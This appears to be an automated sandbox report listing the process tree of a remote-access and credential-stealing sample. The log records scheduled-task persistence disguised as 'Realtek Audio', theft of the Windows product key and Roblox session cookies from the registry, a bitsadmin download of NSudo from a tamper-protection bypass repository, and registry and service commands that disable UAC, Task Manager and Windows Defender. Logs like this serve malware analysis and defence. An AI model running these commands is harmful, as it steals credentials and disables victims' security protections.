LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1528 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1764 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1764 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 876 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 876 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 1504 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1504 3228 LtVS7J0Z7Ji8.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Remote Administration Tool.exe"C:\Users\Admin\AppData\Local\Temp\Remote Administration Tool.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Realtek Audio" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
PID:4976 -
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"2⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Registers COM server for autorun
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Realtek Audio" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:796 -
C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe"C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe"C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul5⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc6⤵PID:1436
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul5⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName6⤵PID:796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2956 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:556 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3024 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4252 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1536 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:2808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4492 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3412 -
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:5092
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:3024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:4388
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:4516
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:1100
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:5084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:4520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:1256
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:1876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:3068
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:4940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:2064
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:3340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:2136
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:3636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:3352
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:3664
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:2124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:2704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:1340
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:5036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:4452
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:4472
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:2964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:928
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:4304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:4268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:4384
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid5⤵PID:228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵PID:3536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:4080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:2456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\disabler.cmd" "1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1664
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Packages /download /priority foreground https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe2⤵
- Download via BitsAdmin
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-182⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\NSudo.exeNSudo -U:T -ShowWindowMode:Hide sc stop windefend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
C:\Windows\helppane.exeC:\Windows\helppane.exe -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=5288842⤵
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2360 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb644f46f8,0x7ffb644f4708,0x7ffb644f47183⤵PID:956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:33⤵PID:2476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵PID:1448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:83⤵PID:3936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:13⤵PID:1776
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:3028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:13⤵PID:2324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵PID:4428
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4708 /prefetch:83⤵PID:4948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,5674834082861723413,4328011181266947265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4044 /prefetch:83⤵PID:2616
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3944
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:796
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 388 -ip 3881⤵PID:4164
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 388 -s 15041⤵
- Program crash
PID:1660
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Modifies data under HKEY_USERS
PID:2620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵PID:4512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:3668
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵PID:4224
-
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding2⤵PID:5040
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵PID:4516
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
PID:4240
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
